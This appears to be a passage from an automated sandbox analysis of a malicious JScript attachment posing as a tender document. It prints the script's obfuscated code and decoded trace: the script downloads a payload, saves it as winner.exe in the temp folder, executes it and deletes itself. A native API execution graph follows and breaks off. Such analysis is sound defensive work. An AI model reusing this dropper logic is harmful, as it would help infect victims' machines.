                                                                                                                                                                                                                                                                                                              • _0x33f1() ➔ WOGynK1UEIHeaCoZd8ogza,3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI13cMmk4B2fiW4xdTW,bmo7FSkWWRb9cuhdOSk3,pAZheY,length,h0H+WOxcJbWDWRJcSmkoWOlcR0y,35751wCkNjf,&DC),198188fskAji,F8kCWOxdSH1PW4e,whGqWOWIpCkIW71DWQruaW,EsmPWRrqsmkRtK/dO8kbamoekMNdSSoScxhdOmodWPVcRtzEereujMdcHMJcMmkSpXnMcmkYWQ5gFmkNvhpcOZlcVeNcOvD6dCoxWQ/cSmkfWQ5gA8odW6iYWRbb,vsWRWQK,WR7cMfrp,W5BcVetcV8osW7zdW68,hSoxWORdHNVdN8klW7G,WOZcLbldI3rPW5jqtSo2,WQNcGrH+WQq,25828720vLEpnk,pmkFW50dCG0jW4LoWPS,Send,12618EMHTyj,mCk/fMJcKCoaxeHDWQ1tWQLEv1xdTHqkWQPruxXUwLZdPa,Close,W4PEFry,zKbRWOpcIgODuuhdMCkwDG,252cwJMcn,W5RcOGxcPSoyWO3dSqG,W57dHuVcIa8+W5bgzmoddvu,WOJdI8o5WOtcJCk0,W7mUrSkZ,W64EsSoZW6ldTxZdO8oKWR09WQlcKmkaimoVo0NdQIm,172CBHuQO,WPZdJwWYW5RcT3RdGGGnlgBcSq,ADODB.Stream,W6ZcGIqLqNC,a8oErHFcRCoYWOudaCkTWQaTpNa5lXXzW7qF,51926vemoDJ,gM3dJZ48WOy8WOFdMsZdQCkaW7S,rmkoj8oa,Open,WPNdVhRcR8kzWQK,3o8g,Type,indexOf,W6fsbSk5WOVcUYv+tsCGaZC,pfOEWQ0,W6ldLeaRW7enWOncnxNdHCkQ,gHZcL8o9k2ZdOZ1bW7BcJSoxWRWt,dmoHW7v3BKGbW6/cMSoQpSk/,CreateObject,W6rYdtFcS8oa,iCoWWQi,W5j3WQD+W4RdLXnfW7VdMCowW7CgWQW,WR7dMNbNmJVcICkHa8oQW6RcQSo0,W4eBm1u,jjEhYu
                                                                                                                                                                                                                                                                                                              • _0x33f1() ➔ 3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI13cMmk4B2fiW4xdTW,bmo7FSkWWRb9cuhdOSk3,pAZheY,length,h0H+WOxcJbWDWRJcSmkoWOlcR0y,35751wCkNjf,&DC),198188fskAji,F8kCWOxdSH1PW4e,whGqWOWIpCkIW71DWQruaW,EsmPWRrqsmkRtK/dO8kbamoekMNdSSoScxhdOmodWPVcRtzEereujMdcHMJcMmkSpXnMcmkYWQ5gFmkNvhpcOZlcVeNcOvD6dCoxWQ/cSmkfWQ5gA8odW6iYWRbb,vsWRWQK,WR7cMfrp,W5BcVetcV8osW7zdW68,hSoxWORdHNVdN8klW7G,WOZcLbldI3rPW5jqtSo2,WQNcGrH+WQq,25828720vLEpnk,pmkFW50dCG0jW4LoWPS,Send,12618EMHTyj,mCk/fMJcKCoaxeHDWQ1tWQLEv1xdTHqkWQPruxXUwLZdPa,Close,W4PEFry,zKbRWOpcIgODuuhdMCkwDG,252cwJMcn,W5RcOGxcPSoyWO3dSqG,W57dHuVcIa8+W5bgzmoddvu,WOJdI8o5WOtcJCk0,W7mUrSkZ,W64EsSoZW6ldTxZdO8oKWR09WQlcKmkaimoVo0NdQIm,172CBHuQO,WPZdJwWYW5RcT3RdGGGnlgBcSq,ADODB.Stream,W6ZcGIqLqNC,a8oErHFcRCoYWOudaCkTWQaTpNa5lXXzW7qF,51926vemoDJ,gM3dJZ48WOy8WOFdMsZdQCkaW7S,rmkoj8oa,Open,WPNdVhRcR8kzWQK,3o8g,Type,indexOf,W6fsbSk5WOVcUYv+tsCGaZC,pfOEWQ0,W6ldLeaRW7enWOncnxNdHCkQ,gHZcL8o9k2ZdOZ1bW7BcJSoxWRWt,dmoHW7v3BKGbW6/cMSoQpSk/,CreateObject,W6rYdtFcS8oa,iCoWWQi,W5j3WQD+W4RdLXnfW7VdMCowW7CgWQW,WR7dMNbNmJVcICkHa8oQW6RcQSo0,W4eBm1u,jjEhYu,WOGynK1UEIHeaCoZd8ogza
                                                                                                                                                                                                                                                                                                              • _0x33f1() ➔ 3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI13cMmk4B2fiW4xdTW,bmo7FSkWWRb9cuhdOSk3,pAZheY,length,h0H+WOxcJbWDWRJcSmkoWOlcR0y,35751wCkNjf,&DC),198188fskAji,F8kCWOxdSH1PW4e,whGqWOWIpCkIW71DWQruaW,EsmPWRrqsmkRtK/dO8kbamoekMNdSSoScxhdOmodWPVcRtzEereujMdcHMJcMmkSpXnMcmkYWQ5gFmkNvhpcOZlcVeNcOvD6dCoxWQ/cSmkfWQ5gA8odW6iYWRbb,vsWRWQK,WR7cMfrp,W5BcVetcV8osW7zdW68,hSoxWORdHNVdN8klW7G,WOZcLbldI3rPW5jqtSo2,WQNcGrH+WQq,25828720vLEpnk,pmkFW50dCG0jW4LoWPS,Send,12618EMHTyj,mCk/fMJcKCoaxeHDWQ1tWQLEv1xdTHqkWQPruxXUwLZdPa,Close,W4PEFry,zKbRWOpcIgODuuhdMCkwDG,252cwJMcn,W5RcOGxcPSoyWO3dSqG,W57dHuVcIa8+W5bgzmoddvu,WOJdI8o5WOtcJCk0,W7mUrSkZ,W64EsSoZW6ldTxZdO8oKWR09WQlcKmkaimoVo0NdQIm,172CBHuQO,WPZdJwWYW5RcT3RdGGGnlgBcSq,ADODB.Stream,W6ZcGIqLqNC,a8oErHFcRCoYWOudaCkTWQaTpNa5lXXzW7qF,51926vemoDJ,gM3dJZ48WOy8WOFdMsZdQCkaW7S,rmkoj8oa,Open,WPNdVhRcR8kzWQK,3o8g,Type,indexOf,W6fsbSk5WOVcUYv+tsCGaZC,pfOEWQ0,W6ldLeaRW7enWOncnxNdHCkQ,gHZcL8o9k2ZdOZ1bW7BcJSoxWRWt,dmoHW7v3BKGbW6/cMSoQpSk/,CreateObject,W6rYdtFcS8oa,iCoWWQi,W5j3WQD+W4RdLXnfW7VdMCowW7CgWQW,WR7dMNbNmJVcICkHa8oQW6RcQSo0,W4eBm1u,jjEhYu,WOGynK1UEIHeaCoZd8ogza
                                                                                                                                                                                                                                                                                                              • _0x33f1() ➔ 3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI13cMmk4B2fiW4xdTW,bmo7FSkWWRb9cuhdOSk3,pAZheY,length,h0H+WOxcJbWDWRJcSmkoWOlcR0y,35751wCkNjf,&DC),198188fskAji,F8kCWOxdSH1PW4e,whGqWOWIpCkIW71DWQruaW,EsmPWRrqsmkRtK/dO8kbamoekMNdSSoScxhdOmodWPVcRtzEereujMdcHMJcMmkSpXnMcmkYWQ5gFmkNvhpcOZlcVeNcOvD6dCoxWQ/cSmkfWQ5gA8odW6iYWRbb,vsWRWQK,WR7cMfrp,W5BcVetcV8osW7zdW68,hSoxWORdHNVdN8klW7G,WOZcLbldI3rPW5jqtSo2,WQNcGrH+WQq,25828720vLEpnk,pmkFW50dCG0jW4LoWPS,Send,12618EMHTyj,mCk/fMJcKCoaxeHDWQ1tWQLEv1xdTHqkWQPruxXUwLZdPa,Close,W4PEFry,zKbRWOpcIgODuuhdMCkwDG,252cwJMcn,W5RcOGxcPSoyWO3dSqG,W57dHuVcIa8+W5bgzmoddvu,WOJdI8o5WOtcJCk0,W7mUrSkZ,W64EsSoZW6ldTxZdO8oKWR09WQlcKmkaimoVo0NdQIm,172CBHuQO,WPZdJwWYW5RcT3RdGGGnlgBcSq,ADODB.Stream,W6ZcGIqLqNC,a8oErHFcRCoYWOudaCkTWQaTpNa5lXXzW7qF,51926vemoDJ,gM3dJZ48WOy8WOFdMsZdQCkaW7S,rmkoj8oa,Open,WPNdVhRcR8kzWQK,3o8g,Type,indexOf,W6fsbSk5WOVcUYv+tsCGaZC,pfOEWQ0,W6ldLeaRW7enWOncnxNdHCkQ,gHZcL8o9k2ZdOZ1bW7BcJSoxWRWt,dmoHW7v3BKGbW6/cMSoQpSk/,CreateObject,W6rYdtFcS8oa,iCoWWQi,W5j3WQD+W4RdLXnfW7VdMCowW7CgWQW,WR7dMNbNmJVcICkHa8oQW6RcQSo0,W4eBm1u,jjEhYu,WOGynK1UEIHeaCoZd8ogza
                                                                                                                                                                                                                                                                                                              • _0x33f1() ➔ 3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI13cMmk4B2fiW4xdTW,bmo7FSkWWRb9cuhdOSk3,pAZheY,length,h0H+WOxcJbWDWRJcSmkoWOlcR0y,35751wCkNjf,&DC),198188fskAji,F8kCWOxdSH1PW4e,whGqWOWIpCkIW71DWQruaW,EsmPWRrqsmkRtK/dO8kbamoekMNdSSoScxhdOmodWPVcRtzEereujMdcHMJcMmkSpXnMcmkYWQ5gFmkNvhpcOZlcVeNcOvD6dCoxWQ/cSmkfWQ5gA8odW6iYWRbb,vsWRWQK,WR7cMfrp,W5BcVetcV8osW7zdW68,hSoxWORdHNVdN8klW7G,WOZcLbldI3rPW5jqtSo2,WQNcGrH+WQq,25828720vLEpnk,pmkFW50dCG0jW4LoWPS,Send,12618EMHTyj,mCk/fMJcKCoaxeHDWQ1tWQLEv1xdTHqkWQPruxXUwLZdPa,Close,W4PEFry,zKbRWOpcIgODuuhdMCkwDG,252cwJMcn,W5RcOGxcPSoyWO3dSqG,W57dHuVcIa8+W5bgzmoddvu,WOJdI8o5WOtcJCk0,W7mUrSkZ,W64EsSoZW6ldTxZdO8oKWR09WQlcKmkaimoVo0NdQIm,172CBHuQO,WPZdJwWYW5RcT3RdGGGnlgBcSq,ADODB.Stream,W6ZcGIqLqNC,a8oErHFcRCoYWOudaCkTWQaTpNa5lXXzW7qF,51926vemoDJ,gM3dJZ48WOy8WOFdMsZdQCkaW7S,rmkoj8oa,Open,WPNdVhRcR8kzWQK,3o8g,Type,indexOf,W6fsbSk5WOVcUYv+tsCGaZC,pfOEWQ0,W6ldLeaRW7enWOncnxNdHCkQ,gHZcL8o9k2ZdOZ1bW7BcJSoxWRWt,dmoHW7v3BKGbW6/cMSoQpSk/,CreateObject,W6rYdtFcS8oa,iCoWWQi,W5j3WQD+W4RdLXnfW7VdMCowW7CgWQW,WR7dMNbNmJVcICkHa8oQW6RcQSo0,W4eBm1u,jjEhYu,WOGynK1UEIHeaCoZd8ogza
                                                                                                                                                                                                                                                                                                              • _0x33f1() ➔ 3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI13cMmk4B2fiW4xdTW,bmo7FSkWWRb9cuhdOSk3,pAZheY,length,h0H+WOxcJbWDWRJcSmkoWOlcR0y,35751wCkNjf,&DC),198188fskAji,F8kCWOxdSH1PW4e,whGqWOWIpCkIW71DWQruaW,EsmPWRrqsmkRtK/dO8kbamoekMNdSSoScxhdOmodWPVcRtzEereujMdcHMJcMmkSpXnMcmkYWQ5gFmkNvhpcOZlcVeNcOvD6dCoxWQ/cSmkfWQ5gA8odW6iYWRbb,vsWRWQK,WR7cMfrp,W5BcVetcV8osW7zdW68,hSoxWORdHNVdN8klW7G,WOZcLbldI3rPW5jqtSo2,WQNcGrH+WQq,25828720vLEpnk,pmkFW50dCG0jW4LoWPS,Send,12618EMHTyj,mCk/fMJcKCoaxeHDWQ1tWQLEv1xdTHqkWQPruxXUwLZdPa,Close,W4PEFry,zKbRWOpcIgODuuhdMCkwDG,252cwJMcn,W5RcOGxcPSoyWO3dSqG,W57dHuVcIa8+W5bgzmoddvu,WOJdI8o5WOtcJCk0,W7mUrSkZ,W64EsSoZW6ldTxZdO8oKWR09WQlcKmkaimoVo0NdQIm,172CBHuQO,WPZdJwWYW5RcT3RdGGGnlgBcSq,ADODB.Stream,W6ZcGIqLqNC,a8oErHFcRCoYWOudaCkTWQaTpNa5lXXzW7qF,51926vemoDJ,gM3dJZ48WOy8WOFdMsZdQCkaW7S,rmkoj8oa,Open,WPNdVhRcR8kzWQK,3o8g,Type,indexOf,W6fsbSk5WOVcUYv+tsCGaZC,pfOEWQ0,W6ldLeaRW7enWOncnxNdHCkQ,gHZcL8o9k2ZdOZ1bW7BcJSoxWRWt,dmoHW7v3BKGbW6/cMSoQpSk/,CreateObject,W6rYdtFcS8oa,iCoWWQi,W5j3WQD+W4RdLXnfW7VdMCowW7CgWQW,WR7dMNbNmJVcICkHa8oQW6RcQSo0,W4eBm1u,jjEhYu,WOGynK1UEIHeaCoZd8ogza
                                                                                                                                                                                                                                                                                                              • _0x33f1() ➔ 3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI13cMmk4B2fiW4xdTW,bmo7FSkWWRb9cuhdOSk3,pAZheY,length,h0H+WOxcJbWDWRJcSmkoWOlcR0y,35751wCkNjf,&DC),198188fskAji,F8kCWOxdSH1PW4e,whGqWOWIpCkIW71DWQruaW,EsmPWRrqsmkRtK/dO8kbamoekMNdSSoScxhdOmodWPVcRtzEereujMdcHMJcMmkSpXnMcmkYWQ5gFmkNvhpcOZlcVeNcOvD6dCoxWQ/cSmkfWQ5gA8odW6iYWRbb,vsWRWQK,WR7cMfrp,W5BcVetcV8osW7zdW68,hSoxWORdHNVdN8klW7G,WOZcLbldI3rPW5jqtSo2,WQNcGrH+WQq,25828720vLEpnk,pmkFW50dCG0jW4LoWPS,Send,12618EMHTyj,mCk/fMJcKCoaxeHDWQ1tWQLEv1xdTHqkWQPruxXUwLZdPa,Close,W4PEFry,zKbRWOpcIgODuuhdMCkwDG,252cwJMcn,W5RcOGxcPSoyWO3dSqG,W57dHuVcIa8+W5bgzmoddvu,WOJdI8o5WOtcJCk0,W7mUrSkZ,W64EsSoZW6ldTxZdO8oKWR09WQlcKmkaimoVo0NdQIm,172CBHuQO,WPZdJwWYW5RcT3RdGGGnlgBcSq,ADODB.Stream,W6ZcGIqLqNC,a8oErHFcRCoYWOudaCkTWQaTpNa5lXXzW7qF,51926vemoDJ,gM3dJZ48WOy8WOFdMsZdQCkaW7S,rmkoj8oa,Open,WPNdVhRcR8kzWQK,3o8g,Type,indexOf,W6fsbSk5WOVcUYv+tsCGaZC,pfOEWQ0,W6ldLeaRW7enWOncnxNdHCkQ,gHZcL8o9k2ZdOZ1bW7BcJSoxWRWt,dmoHW7v3BKGbW6/cMSoQpSk/,CreateObject,W6rYdtFcS8oa,iCoWWQi,W5j3WQD+W4RdLXnfW7VdMCowW7CgWQW,WR7dMNbNmJVcICkHa8oQW6RcQSo0,W4eBm1u,jjEhYu,WOGynK1UEIHeaCoZd8ogza
                                                                                                                                                                                                                                                                                                              159
                                                                                                                                                                                                                                                                                                              return _0x10bd =
                                                                                                                                                                                                                                                                                                                160
                                                                                                                                                                                                                                                                                                                function (_0x10bd08, _0x516731) {
                                                                                                                                                                                                                                                                                                                • _0x10bd(202,undefined) ➔ "Open"
                                                                                                                                                                                                                                                                                                                • _0x10bd(202,undefined) ➔ "WPNdVhRcR8kzWQK"
                                                                                                                                                                                                                                                                                                                • _0x10bd(200,undefined) ➔ "rmkoj8oa"
                                                                                                                                                                                                                                                                                                                • _0x10bd(161,undefined) ➔ "cz*B"
                                                                                                                                                                                                                                                                                                                • _0x10bd(202,undefined) ➔ "3o8g"
                                                                                                                                                                                                                                                                                                                • _0x10bd(200,undefined) ➔ "Open"
                                                                                                                                                                                                                                                                                                                • _0x10bd(161,undefined) ➔ "W5ZdI13cMmk4B2fiW4xdTW"
                                                                                                                                                                                                                                                                                                                • _0x10bd(166,undefined) ➔ "35751wCkNjf"
                                                                                                                                                                                                                                                                                                                • _0x10bd(192,undefined) ➔ "172CBHuQO"
                                                                                                                                                                                                                                                                                                                • _0x10bd(215,undefined) ➔ "W4eBm1u"
                                                                                                                                                                                                                                                                                                                161
                                                                                                                                                                                                                                                                                                                _0x10bd08 = _0x10bd08 - 0x99;
                                                                                                                                                                                                                                                                                                                  162
                                                                                                                                                                                                                                                                                                                  var _0x347c9 = _0x33f15e[_0x10bd08];
                                                                                                                                                                                                                                                                                                                    163
                                                                                                                                                                                                                                                                                                                    return _0x347c9;
                                                                                                                                                                                                                                                                                                                      164
                                                                                                                                                                                                                                                                                                                      }, _0x10bd ( _0x11a177, _0x26656a );
                                                                                                                                                                                                                                                                                                                        165
                                                                                                                                                                                                                                                                                                                        }
                                                                                                                                                                                                                                                                                                                          166
                                                                                                                                                                                                                                                                                                                          Stream[_0x406710 ( 0x1e9, 'Lnop' ) ] ( ), Stream[_0x1f863f ( 0x1ea ) ] = 0x1, Stream[_0x406710 ( 0x1fe, _0x25fd55 ( 0xbe, 'xB*!' ) ) ] ( Object[_0x406710 ( 0x1eb, '55^f' ) ] ), Stream[_0x406710 ( 0x202, _0xfacb16 ( 0xc9 ) ) ] = 0x0, Stream[_0x1f863f ( 0x1e8 ) ] ( pOut, 0x2 ), Stream[_0x1f863f ( 0x1f6 ) ] ( ), new ActiveXObject ( _0x1f863f ( 0x1fa ) ) [_0x406710 ( 0x208, _0x25fd55 ( 0xb8, 'o5HG' ) ) ] ( pOut, '', '', _0x406710 ( 0x1fc, 'Rtbv' ), '1' ), new ActiveXObject ( _0x1f863f ( 0x204 ) ) [_0x1f863f ( 0x1f1 ) ] ( WScript[_0x25fd55 ( 0xb1, 'LA#Q' ) ] );
                                                                                                                                                                                                                                                                                                                          • _0x406710(489,"Lnop") ➔ "Open"
                                                                                                                                                                                                                                                                                                                          • Open() ➔ undefined
                                                                                                                                                                                                                                                                                                                          • _0x1f863f(490) ➔ "Type"
                                                                                                                                                                                                                                                                                                                          • _0x25fd55(190,"xB*!") ➔ "n@H!"
                                                                                                                                                                                                                                                                                                                          • _0x406710(510,"n@H!") ➔ "Write"
                                                                                                                                                                                                                                                                                                                          • _0x406710(491,"55^f") ➔ "ResponseBody"
                                                                                                                                                                                                                                                                                                                          • Write() ➔ undefined
                                                                                                                                                                                                                                                                                                                          • _0xfacb16(201) ➔ "&DC)"
                                                                                                                                                                                                                                                                                                                          • _0x406710(514,"&DC)") ➔ "Position"
                                                                                                                                                                                                                                                                                                                          • _0x1f863f(488) ➔ "SaveToFile"
                                                                                                                                                                                                                                                                                                                          • SaveToFile("C:\Users\alfons\AppData\Local\Temp\winner.exe",2) ➔ undefined
                                                                                                                                                                                                                                                                                                                          • _0x1f863f(502) ➔ "Close"
                                                                                                                                                                                                                                                                                                                          • Close() ➔ undefined
                                                                                                                                                                                                                                                                                                                          • _0x1f863f(506) ➔ "Shell.Application"
                                                                                                                                                                                                                                                                                                                          • _0x25fd55(184,"o5HG") ➔ "#zNv"
                                                                                                                                                                                                                                                                                                                          • _0x406710(520,"#zNv") ➔ "ShellExecute"
                                                                                                                                                                                                                                                                                                                          • _0x406710(508,"Rtbv") ➔ "open"
                                                                                                                                                                                                                                                                                                                          • ShellExecute("C:\Users\alfons\AppData\Local\Temp\winner.exe","","","open","1") ➔ undefined
                                                                                                                                                                                                                                                                                                                          • _0x1f863f(516) ➔ "Scripting.FileSystemObject"
                                                                                                                                                                                                                                                                                                                          • _0x1f863f(497) ➔ "DeleteFile"
                                                                                                                                                                                                                                                                                                                          • _0x25fd55(177,"LA#Q") ➔ "ScriptFullName"
                                                                                                                                                                                                                                                                                                                          • DeleteFile("C:\Users\alfons\Desktop\0900664 MOHS Tender..js") ➔ undefined
                                                                                                                                                                                                                                                                                                                          Reset < >

                                                                                                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                                                                                                            Execution Coverage:7.5%
                                                                                                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:4%
                                                                                                                                                                                                                                                                                                                            Signature Coverage:5.6%
                                                                                                                                                                                                                                                                                                                            Total number of Nodes:780
                                                                                                                                                                                                                                                                                                                            Total number of Limit Nodes:82
                                                                                                                                                                                                                                                                                                                            execution_graph 16468 401720 16469 401723 16468->16469 16472 423273 16469->16472 16475 41fc13 16472->16475 16476 41fc39 16475->16476 16489 40bef3 16476->16489 16478 41fc45 16479 4017d3 16478->16479 16497 410103 16478->16497 16481 41fc64 16482 41fc77 16481->16482 16509 4100c3 16481->16509 16485 41fc8c 16482->16485 16518 41e8c3 16482->16518 16514 403553 16485->16514 16487 41fc9b 16488 41e8c3 2 API calls 16487->16488 16488->16479 16492 40bf00 16489->16492 16521 40be43 16489->16521 16491 40bf07 16491->16478 16492->16491 16533 40bde3 16492->16533 16498 41012f 16497->16498 17065 40d433 16498->17065 16500 410141 17069 40ffd3 16500->17069 16503 410174 16506 410185 16503->16506 16508 41e6a3 2 API calls 16503->16508 16504 41015c 16505 410167 16504->16505 16507 41e6a3 2 API calls 16504->16507 16505->16481 16506->16481 16507->16505 16508->16506 16510 4195b3 LdrLoadDll 16509->16510 16511 4100e2 16510->16511 16512 4100e9 16511->16512 16513 4100eb GetUserGeoID 16511->16513 16512->16482 16513->16482 16515 4035aa 16514->16515 16517 4035b7 16515->16517 17088 40ddc3 16515->17088 16517->16487 16519 41f1e3 LdrLoadDll 16518->16519 16520 41e8e2 ExitProcess 16519->16520 16520->16485 16552 41ce43 16521->16552 16525 40be69 16525->16492 16526 40be5f 16526->16525 16559 41f563 16526->16559 16528 40bea6 16528->16525 16570 40bc83 16528->16570 16530 40bec6 16576 40b6e3 16530->16576 16532 40bed8 16532->16492 17045 41f853 16533->17045 16536 41f853 LdrLoadDll 16537 40be14 16536->16537 16538 41f853 LdrLoadDll 16537->16538 16539 40be2d 16538->16539 16540 40fec3 16539->16540 16541 40fedc 16540->16541 17049 40d2b3 16541->17049 16543 40feef 17053 41e3f3 16543->17053 16547 40ff15 16550 40ff40 16547->16550 17059 41e473 16547->17059 16549 41e6a3 2 API calls 16551 40bf18 16549->16551 16550->16549 16551->16478 16553 41ce52 16552->16553 16580 4195b3 16553->16580 16555 40be56 16556 41cd03 16555->16556 16612 41e813 16556->16612 16560 41f57c 16559->16560 16619 4191a3 16560->16619 16562 41f594 16563 41f59d 16562->16563 16658 41f3a3 16562->16658 16563->16528 16565 41f5b1 16565->16563 16675 41e113 16565->16675 16567 41f5e5 16680 420113 16567->16680 17016 409473 16570->17016 16572 40bca4 16572->16530 16573 40bc9d 16573->16572 17029 409733 16573->17029 16577 40b70b 16576->16577 17038 40d183 16577->17038 16579 40b741 16579->16532 16581 4195cd 16580->16581 16582 4195c1 16580->16582 16581->16555 16582->16581 16585 419a33 16582->16585 16590 419733 16585->16590 16587 41971f 16587->16555 16588 419a4b 16588->16587 16589 4195b3 LdrLoadDll 16588->16589 16589->16587 16592 419758 16590->16592 16591 4197c7 16591->16588 16592->16591 16604 40cf63 16592->16604 16594 4197f9 16600 41989e 16594->16600 16608 4202d3 16594->16608 16597 419897 16597->16600 16602 419a33 LdrLoadDll 16597->16602 16598 419904 16599 419a33 LdrLoadDll 16598->16599 16598->16600 16601 419936 16599->16601 16600->16588 16601->16588 16603 4198fa 16602->16603 16603->16588 16605 40cf87 16604->16605 16606 40cfc3 LdrLoadDll 16605->16606 16607 40cf8e 16605->16607 16606->16607 16607->16594 16609 419840 16608->16609 16610 4202e3 16608->16610 16609->16597 16609->16598 16609->16600 16611 4195b3 LdrLoadDll 16610->16611 16611->16609 16615 41f1e3 16612->16615 16614 41cd18 16614->16526 16617 41f1f2 16615->16617 16618 41f268 16615->16618 16616 4195b3 LdrLoadDll 16616->16618 16617->16616 16617->16618 16618->16614 16620 4191b7 16619->16620 16621 4194e6 16619->16621 16620->16621 16683 41de63 16620->16683 16621->16562 16624 4192e8 16686 41e573 16624->16686 16625 4192cb 16743 41e673 16625->16743 16628 4192d5 16628->16562 16629 41930f 16630 420113 2 API calls 16629->16630 16631 41931b 16630->16631 16631->16628 16632 4194aa 16631->16632 16633 4194c0 16631->16633 16638 4193b3 16631->16638 16634 41e6a3 2 API calls 16632->16634 16769 418ec3 16633->16769 16635 4194b1 16634->16635 16635->16562 16637 4194d3 16637->16562 16639 41941a 16638->16639 16640 4193c2 16638->16640 16639->16632 16641 41942d 16639->16641 16643 4193c7 16640->16643 16644 4193db 16640->16644 16759 41e4f3 16641->16759 16746 418d83 16643->16746 16647 4193e0 16644->16647 16648 4193f8 16644->16648 16689 418e23 16647->16689 16648->16635 16701 418b43 16648->16701 16650 4193d1 16650->16562 16653 4193ee 16653->16562 16656 419410 16656->16562 16657 419499 16657->16562 16660 41f3be 16658->16660 16659 41f3d0 16659->16565 16660->16659 16842 420093 16660->16842 16662 41f3f0 16845 4187a3 16662->16845 16664 41f413 16664->16659 16665 4187a3 3 API calls 16664->16665 16667 41f435 16665->16667 16667->16659 16877 419b03 16667->16877 16668 41f4bd 16669 41f4cd 16668->16669 16972 41f163 16668->16972 16888 41efd3 16669->16888 16672 41f4fb 16967 41e0d3 16672->16967 16674 41f525 16674->16565 16676 41e12f 16675->16676 16677 41f1e3 LdrLoadDll 16675->16677 17010 126967a 16676->17010 16677->16676 16678 41e14a 16678->16567 16681 41f60f 16680->16681 17013 41e883 16680->17013 16681->16528 16684 41f1e3 LdrLoadDll 16683->16684 16685 41929c 16684->16685 16685->16624 16685->16625 16685->16628 16687 41f1e3 LdrLoadDll 16686->16687 16688 41e58f NtCreateFile 16687->16688 16688->16629 16690 418e3f 16689->16690 16691 41e4f3 LdrLoadDll 16690->16691 16692 418e60 16691->16692 16693 418e67 16692->16693 16694 418e7b 16692->16694 16696 41e6a3 2 API calls 16693->16696 16695 41e6a3 2 API calls 16694->16695 16697 418e84 16695->16697 16698 418e70 16696->16698 16807 420233 16697->16807 16698->16653 16700 418e8f 16700->16653 16702 418bc1 16701->16702 16703 418b8e 16701->16703 16704 418d0c 16702->16704 16709 418bdd 16702->16709 16705 41e4f3 LdrLoadDll 16703->16705 16707 41e4f3 LdrLoadDll 16704->16707 16706 418ba9 16705->16706 16708 41e6a3 2 API calls 16706->16708 16713 418d27 16707->16713 16710 418bb2 16708->16710 16711 41e4f3 LdrLoadDll 16709->16711 16710->16656 16712 418bf8 16711->16712 16715 418c14 16712->16715 16716 418bff 16712->16716 16714 41e533 LdrLoadDll 16713->16714 16717 418d61 16714->16717 16719 418c19 16715->16719 16720 418c2f 16715->16720 16718 41e6a3 2 API calls 16716->16718 16721 41e6a3 2 API calls 16717->16721 16722 418c08 16718->16722 16723 41e6a3 2 API calls 16719->16723 16726 418c34 16720->16726 16813 4201f3 16720->16813 16725 418d6c 16721->16725 16722->16656 16724 418c22 16723->16724 16724->16656 16725->16656 16730 418c46 16726->16730 16816 41e623 16726->16816 16729 418c9a 16731 418cb1 16729->16731 16824 41e4b3 16729->16824 16730->16656 16732 418cb8 16731->16732 16733 418ccd 16731->16733 16735 41e6a3 2 API calls 16732->16735 16736 41e6a3 2 API calls 16733->16736 16735->16730 16737 418cd6 16736->16737 16738 418d02 16737->16738 16819 41ff13 16737->16819 16738->16656 16740 418ced 16741 420113 2 API calls 16740->16741 16742 418cf6 16741->16742 16742->16656 16744 41e68f 16743->16744 16745 41f1e3 LdrLoadDll 16743->16745 16744->16628 16745->16744 16747 418dc0 16746->16747 16827 41e1d3 16746->16827 16749 418dc7 16747->16749 16750 418ddb 16747->16750 16751 41e6a3 2 API calls 16749->16751 16832 41e223 16750->16832 16753 418dd0 16751->16753 16753->16650 16755 41e6a3 2 API calls 16756 418e05 16755->16756 16757 41e6a3 2 API calls 16756->16757 16758 418e0f 16757->16758 16758->16650 16760 41e4f7 16759->16760 16761 41f1e3 LdrLoadDll 16760->16761 16762 419475 16761->16762 16763 41e533 16762->16763 16764 41f1e3 LdrLoadDll 16763->16764 16765 41948d 16764->16765 16766 41e6a3 16765->16766 16767 41f1e3 LdrLoadDll 16766->16767 16768 41e6bf NtClose 16767->16768 16768->16657 16770 41e4f3 LdrLoadDll 16769->16770 16771 418f01 16770->16771 16772 418f0a 16771->16772 16773 418f1f 16771->16773 16774 41e6a3 2 API calls 16772->16774 16775 418f43 16773->16775 16776 418f8d 16773->16776 16787 418f13 16774->16787 16839 41e5d3 16775->16839 16777 418fd3 16776->16777 16778 418f92 16776->16778 16783 418fe5 16777->16783 16786 41915d 16777->16786 16782 41e623 2 API calls 16778->16782 16778->16787 16781 41e6a3 2 API calls 16781->16787 16784 418fbd 16782->16784 16785 418fea 16783->16785 16796 419025 16783->16796 16788 41e6a3 2 API calls 16784->16788 16789 41e5d3 LdrLoadDll 16785->16789 16786->16787 16791 41e6a3 2 API calls 16786->16791 16787->16637 16792 418fc6 16788->16792 16790 41900d 16789->16790 16793 41e6a3 2 API calls 16790->16793 16794 41918e 16791->16794 16792->16637 16797 419016 16793->16797 16794->16637 16795 41902a 16795->16787 16798 41e5d3 LdrLoadDll 16795->16798 16796->16795 16802 419106 16796->16802 16797->16637 16799 41904a 16798->16799 16800 41e6a3 2 API calls 16799->16800 16801 419055 16800->16801 16801->16637 16802->16787 16803 41e5d3 LdrLoadDll 16802->16803 16804 419145 16803->16804 16805 41e6a3 2 API calls 16804->16805 16806 41914e 16805->16806 16806->16637 16810 41e843 16807->16810 16809 42024d 16809->16700 16811 41f1e3 